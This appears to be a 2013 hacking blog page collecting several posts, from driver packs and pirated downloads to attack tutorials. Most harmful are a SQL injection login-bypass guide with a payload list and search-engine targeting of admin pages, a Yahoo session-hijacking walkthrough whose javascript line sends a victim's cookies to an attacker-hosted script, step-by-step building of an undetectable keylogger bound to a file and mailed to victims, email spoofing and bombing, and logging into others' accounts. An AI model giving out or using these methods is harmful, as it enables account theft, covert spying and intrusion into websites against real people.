Showing posts with label HACK. Show all posts
Showing posts with label HACK. Show all posts

Wednesday, 28 August 2013

Netsparker - Web Security Scanner

Netsparker - Web Security Scanner


What is Netsparker?

Netsparker is the only False-positive web application security scanner. Simply point it at your website and it will automatically discover the flaws that could leave you dangerously exposed.







For More Info  

DriverPacks for Windows (2000/XP/2003/Vista/7) (X86/X64)

DriverPacks for Windows (2000/XP/2003/Vista/7) (X86/X64)



DriverPacks for Windows (2000/XP/2003/Vista/7) 

Driver Packs for Windows 2000/XP/2003/Vista/7 is a collection Driver Pack.

Last updated drivers - 09 October 2012.

Not necessarily those driver pack integrate into the distribution Windows, you can also put the driver manually after installing Windows.

Extras. Information:

1) in the properties of the device you want to install the driver in the line "device instance ID" search text DEV_ **** (instead of 4 stars - 4 digits or letters).

2) looking for (eg searching in total commander) contents drayverpakov files *. Inf text DEV_ **** (instead of 4 stars - your 4 numbers or letters).

3) The search result will show you which folder / folders likely to lie right driver for this device.
If the line "device instance ID" no text DEV_ ****, you can search on what else the text of this row.
if not, you can intuitively poperebirat several putatively necessary folders, folder names that begin with the same letter, which begins the name of the device manufacturer.
information about the devices may for example give the program hwinfo32.

windows 2000-xp-2003 (x86) driverpacks
dp bluetooth wnt5 x86-32 910
dp chipset wnt5 x86-32 1209
dp cpu wnt5 x86-32 1005
dp graphics a wnt5 x86-32 1206
dp graphics b wnt5 x86-32 1206
dp graphics c wnt5 x86-32 1206
dp graphics languages wnt5 x86-32 1206
dp graphics physx wnt5 x86-32 1206
dp hid wnt5 x86-32 1209
dp lan wnt5 x86-32 1205
dp lan-ris wnt5 x86-32 1011
dp massstorage wnt5 x86-32 1209
dp misc wnt5 x86-32 1201
dp modem wnt5 x86-32 1205
dp monitor wnt5 x86-32 1005
dp runtimes wnt5 x86-32 1206
dp sound a wnt5 x86-32 1111
dp sound b wnt5 x86-32 1111
dp tv wnt5 x86-32 1005
dp webcam wnt5 x86-32 1107
dp wlan wnt5 x86-32 1202

windows vista-7 (x86) driverpacks
dp amdfilter wnt6-x86 1110
dp audio wnt6-x86 1111
dp cablemodem wnt6-x86 1001
dp cardreaders wnt6-x86 11041
dp chipset wnt6-x86 1212
dp gaming wnt6-x86 1001
dp graphics a wnt6-x86 1203
dp graphics b wnt6-x86 1203
dp graphics mobile wnt6-x86 1203
dp lan wnt6-x86 1208
dp massstorage wnt6-x86 12121
dp misc wnt6-x86 1202
dp modem wnt6-x86 1001
dp monitors wnt6-x86 1001
dp touchpad mouse wnt6-x86 1203
dp tvcard wnt6-x86 1001
dp webcam wnt6-x86 1103
dp wlan wnt6-x86 1203

windows vista-7 (x64) driverpacks
dp amdfilter wnt6-x64 1110
dp audio wnt6-x64 1111
dp cardreaders wnt6-x64 11041
dp chipset wnt6-x64 1212
dp graphics a wnt6-x64 1203
dp graphics b wnt6-x64 1203
dp graphics mobile wnt6-x64 1203
dp lan wnt6-x64 1208
dp massstorage wnt6-x64 12121
dp misc wnt6-x64 1202
dp touchpad mouse wnt6-x64 1203
dp webcam wnt6-x64 1103
dp wlan wnt6-x64 1203
gaming x64 812
monitors x64 911
 

The Google Resume

The Google Resume - How to Prepare for a Career and Land a Job at Apple, Microsoft, Google, or any Top Tech Company.



The Google Resume is the only book available on how to win a coveted spot at Google, Microsoft, Apple, or other top tech firms

Gayle Laakmann McDowell worked in Google Engineering for three years, where she served on the hiring committee and interviewed over 120 candidates. She interned for Microsoft and Apple, and interviewed with and received offers from ten tech firms. 

If you âre a student, you€™ll learn what to study and how to prepare while in school, as well as what career paths to consider. If you’re a job seeker, you’ll get an edge on your competition by learning about hiring procedures and making yourself stand out from other candidates.

                                                           DOWNLOAD

Pass  for rar file :- 
http://hackerszonebywasim.blogspot.in

Download torrents without clients

Download torrents without clients

Remember such conditions?? when you want to download a torrent file and you find that the torrent client is missing mostly happens when you are using some ones else system or most probably you are in Cyber Cafe :P . And now who the hell gonna download a torrent client >_< just to download one torrent :P . So here we go

First Go HERE





Now just Browse your torrent there :) from “Browse” button , and Click Start Downloading.

Now the website will generate an exe file for you . Download that…  and then run .

Now you will see the your torrent getting downloaded :)

Enjoyyyy…..

Tuesday, 27 August 2013

Hack The Hacker Using BinText



Hack The Hacker Using BinText

What Is BinText :- 

BinText is a very fast and powerful text extractor  software used to extract text from application or any file.
It can extract email ID and password from applications like Hotmail Hacker, Gmail Hacker, Facebook Hacker or any Keyloggers and Stealers.

Step by Step usage :-

1) First of all Download The BinText .

Click Here To Download BinText Latest Version

2) Unzip the downloaded Bin Text software and open it.

NOTE - Some Anti-virus packages may falsely report this product as a Virus application.
Of course it will not ever be infected by any kind ofviruses/malwares/spywares.
It is simply a false positive detection because antivirus software does not to consider the possibility that a piece of software is able to perform such actions and should to be not detected


3) After Opening You Will Get The Main Screen Like This.



4) Now browse for the location where you have kept the Keylogger ,Stealer or any Facebook hacker file that the hacker has sent you to hack your PC.

5) Now Hit GO.

6) Bin Text will scan the whole file and display all the extracted text from that file which the hacker has sended you like this below.



7) Now scroll down till you find email address and password as I have shown in the screen shot.



8) We Got The User Name and Password of that file which the hacker sended us..



       Now Its Time to HACK THE HACKER.Go In his account and Fuck Him.

Download as a Premium member from any Premium Downloading Site.

First Off all Go HERE 

Now Copy Your Download Link And Paste ,Then Click On Generate
Now download from that Generated Link .

Enjoy Premium Downloads at High speed.

Be A System User In Windows ( Total Owner Of your Computer)


Q:  Now, What IS that SYSTEM user?
A:  The SYSTEM user is the most powerful user on your computer. 
         It can go in ALL System folders, for example Administrators can't.


Before I begin this Tutorial a small introduction of System User for those who don’t know what is a system user. 
In Windows XP there are basically 5 users, differentiated based on their privileges, they are
  • System
  • Administrator
  • Power Users
  • Users, and
  • Guest
System user has got the top privileges in all the users.


If you think Administrator has the largest privileges onto the computer, then you are wrong.

There is a user who is named SYSTEM.
SYSTEM has full control of the operating system and it’s kernel. If you open windows task manager (press ctrl+alt and delete) you will see that System User controls several processes.
These processes cannot be closed by Administrator.


Whenever you open task-manager (CTRL+ALT+DEL) you get a long list of processes running on it.


As you can see that a lot of processes are running with user name System. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account. Attempting to close them will result in a error message, and even a forceful attempt to close ant System User run process may even let your system to shutdown

So here is the tutorial showing how you can get privileges of System user (Under normal condition You can not log into system account).
Before doing any thing please make sure that you are logged in as Administrator.

1. Open Command Prompt. Go to Start , then Run. 
In Run option type cmd and click OK. 
After this will openCommand Prompt, or Start->All Programs ->Accessories->Command Prompt

2. In Command Prompt write at 13:55 /interactive “cmd.exe” and press enter , the time is usually a minute or two ahead of your present time in the 24 hours format.



After a minute or two will appear new Comand Prompt Window wit different title bar. It has changed from cmd.exe to svchost.exe.




3. End current explorer.exe process. Open Task Manager, select explorer.exe and click End Process.


4. In new Comand Prompt with title svchost.exe write cd.. and press enter , then write explorer.exe and press enter.



After this you will become SYSTEM user,Go to Start and check whether you are logged in as Administrator or System user.

FREE BROWSING ON PC, FOR ALL NETWORKS



FREE BROWSING ON PC, FOR ALL NETWORKS




Before you need to download your-freedom software on your PC 

                                          Click Here To Download


Lets us start the tutorials . . . 

Goto your-freedom and register a free account with them, then configure it with below:

click on configure: enter the following settings :-

YF server: ems12.your-freedom.de

connection mode: HTTPS
port:443
tweak: none 
minimum buffer: 1500
reconnection delay: 5000
initial post size: 20000
FTP mode: both
then click on the account information: enter your username and password, click on 'AVE and EXIT ans you're good to go!.





change your proxy to 
IP: 127.0.0.1
port:8080
use same proxy for all protocol

connect your modem ( or phone modem) and click on 'Start connection in your freedom software.

if your want high speed browsing with unlimited connection time , you need to upgrade your account to basic account . . .

1 month-=1,500
2 month =-4,500




note***** make sure you click on start connection immediately you connect your modem, else it may not connect****

HACK WEBSITE ADMIN USING SQL INJECTION


First open http://www.google.com 
write in the google search bar "Admin.asp and then press the search tab.
now a number of website opened with admin log page. 
now click on target website means click on the website you want to hack. Then a page with username and password has been opened 
e.g: welcome to adminxxxx

username=admin.
now the part password if is made on sql then the password is: 1'or'1'=1 
actually it is sql injection which breaks the server firefall. 

here are the list of common sql injections below:

'1'=1

'0"=0

"a"="a"

('x=x"

1=1--

0=0#

') or a"='a

hi" or 1'=1"

****note*** this tricks is for educational purpose ******

Send , identify , trace Fake/Spoofed Email | Email Bombing | Email Spamming



Basics of working of Email

Email stands for Electronic Mail. 
Email sending and receiving is controlled by the Email servers.Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally.Users from across the world register in to these Email servers and setup an Email account.


Email Travelling Path :-

Let’s say we have two Email providers, one is gmail.com and other is yahoo.com, 
ABC is a registered user in gmail.com and XYZ is a registered user in yahoo.com.

• ABC signs in to his Email account in gmail.com, he then writes a mail to the xyz@yahoo.com and sends the message.


• But what happens behind the curtains, the Email from the computer of abc@gmail.com is forwarded to the Email server of gmail.com. Server of gmail.com then looks for yahoo.com on the internet and forwards the Email of the yahoo.com for the account of XYZ@yahoo.com. Yahoo server puts that email in that account.


• XYZ then sits on computer and signs in to her Email account.Now she has the message in her Email inbox.





Sending Fake/spoofed Email -:  

Fake or spoofed email means the email from any email ID. 
It doesn't matter whether the sender's email really exists or not. 
Sender's email ID can be anything@anything.com. 

DISCLAIMER :- Know Hacking but No Hacking 
Warning : Gaining unauthorized access over websites,systems or email accounts, spying on computers in an unethical manner, identity theft, intellectual property theft , black hat hacking are serious crimes.Iam not responsible for any of such kind of illegal activities performed by learners or readers.

Method :-

Using Websites : There are numberless websites that provide free service to send fake emails. But the problem is that they attach the advertisements along with your email.  But the best , I have found that do not attach the advertisements.

Click Here To Visit   {have some advance options}



What is Email Spamming and Email Bombing ?

Email Bombing as clear from the name is sending the mass emails that is large number of emails to a email ID in a single click.


Email spamming is like sending an email to large number of email IDs in a single click. 

These activties are performed mainly for the advertisements of the products or services provided by a company. Many spammers spam to collect individual's personal information through some stupid things like 'fill these details to get your lottery amount' and that information is sold to businessmen looking for the people of different categories. There could be many more reasons of spamming. Spammers use automated tools to collect as many emails available on websites,forms,chat rooms and send spams to them. 

How to identify whether an email is real or spoofed ?

It can be done by checking headers. Email headers is simply the text which contains the information about the mail servers that the email encountered in its path from the sender to receiver. It contains a lot of other information too.


Note: I am just telling you a few points about this so that you would just get an idea about the approach. This may or may not depend on some factors.

We can view email headers in gmail by clicking at 'show original', in yahoo by clicking at 'Full headers' and such kinds of options in other email service providers.


If  you get an email displaying sender's email like someone@gmail.com, someone@hotmail.com, someone@yahoo.com . Then it should be originated from gmail,hotmail and yahoo servers respectively. 
But if it doesn't, the most probably the email would be fake.  



I will show you by an example, I received three emails in my gmail inbox from sender's address "someone@gmail.com."  Sender's address shows me that they should have been originated from gmail/google server, if they would be real.

Note : There is a field called "Return-path" in headers.  If the email ID shown in this field and email ID you get as sender's email ID doesn't match, then the email is surely fake.







Can we get sender's IP address from Email Headers ?
 

We may or may not. Gmail, yahoo normally do not reveal sender's IP address. But when we send an email from a php script,  the headers might reveal Sender's IP. The conclusion is that answer to this question varies from different email service providers and the way how email is sent.


Can we trace sender's location, 
if we get his IP address ?

The IP address could only tell that which Internet Service Provider (ISP) is used by sender. Further details can not be revealed without the help of that ISP. Normally the Public IP is dynamic that is it keeps changing. We need to ask ISP about the user who was assigned that IP at the time email was sent. If sender has purchased a static IP address, it doesn't matter that when exactly was email sent. He could easily be traced
hack yahoo id by session cookies
What are session IDs or session cookies ?

Iam Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. 

Type in browser javascript:alert(document.cookie);(This Java Script works only in Internet Explorer) You would get a pop up box showing you the cookies. 
Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .


Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies. 

An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesn't get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs. 



Requirement :- Yahoo Cookie Stealer

             Click Here To Download 


Tutorial to steal session IDs :-

1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. 

     Upload the four files that you have just downloaded.
     Make a new directory 'cookies' here.



3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account.

Code :- javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 

Stolen cookies get stored in directory 'cookies' 

4. Open the hacked.php . The password is 'hackerszone'. 



You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.


Now it doesn't matter if victim signs out from his account, you would remain logged into it.





Detect Invisible Users In Yahoo Messanger So your Friends Cant Fool You.

Most of the time it happens That your friends make offline only for You in Yahoo...So that You will see him/her as offline and cannot chat .

Many of my friends ask me how to check if the yahoo user is offline or online...

So here are the top best websites which will show you if your friends are online OR offline

CLICK HERE TO VISIT 

CLICK HERE TO VISIT 

Thursday, 6 June 2013

Hack Gmail,Myspace,Facebook accounts Using Rinlogger (100 % Free Fud Keylogger )

Hack Gmail,Myspace,Facebook accounts Using Rinlogger (100 % Free Fud Keylogger )



Keylogging is one of the Easiest ways that you can use to Hack Gmail, My space,Face book accounts .If your new to the concept of key logging I would suggest you read my previous article What are Keyloggers before reading this one

In one of my previous posts i gave you Free ardamax keylogger to hack gmail, Facebook account passwords but many complained that it was easily  detected by anti viruses. So today i will give you a free Keylogger (Rinlogger) which is 100 % FUD (fully undetectable by anti viruses )


Hack Gmail /Myspace /Facebook accounts Using Rinlogger
Concept :-
For Rinlogger(keylogger) to work, the victim has to install a server file on his computer. This server file keeps on recording and sending all typed keystrokes from victim computer. No doubt, these keystrokes contain the victim’s Gmail password. All such keystrokes are sent by server in your mailbox and thus, you can easily hack Gmail account of your friends using this method.

Working :-

1. First a fall  download Rinlogger from Here & to get the password Click Here

2. After downloading, Open Rinlogger and click "create new " as shown


3. Now enter the following information

Email - your email address (gmail recommented)
Account password - Your email password
Keylogger Recipients - Enter your email address

finally click next as shown

4. Now enter the duration (time in minutes)  to receive email Key logs (recommended 5 min ), after that hit "verify now " If you get a message saying verified, your good to go, click next

5. Now change Install keylogger to “Enabled”. Name the file anything you want and select Installation path as “Startup”,Finally click next


6. Now change enable downloader to Enabled” & check once only (requires install) ,finally click next 3 three times


7. Now change enable file binder to Enabled” , and select any application or file document to bind by clicking File binder setup as shown , Then click next and change Steal passwords to "enabled ",finally click next two times



8. Hit on “?” button besides every textbox to generate random product information. and finally click Next
.

9. Now, hit on “Save As” and select the path where you want to save your keylogger server file. Click on “Compile”.


voilà ,You have successfully created a keylogger server file. Now, simply send this file to your victim via email , Once the victim runs our keylogger, we will get key logs every  5min via email as shown


AV Scan Result 


Note :-
AV scan result shows this key logger is currently 100% FUD , but since its a free /public key logger it will be detected by anti viruses very soon .So my advice is use this key logger as long as it is FUD and make the most out of it .We also recommend you to use – Winspy keylogger orSniperspy which are FUD for life time (Fully Undetectable).

Hope you enjoyed the post , For further doubts and clarifications please pass your comments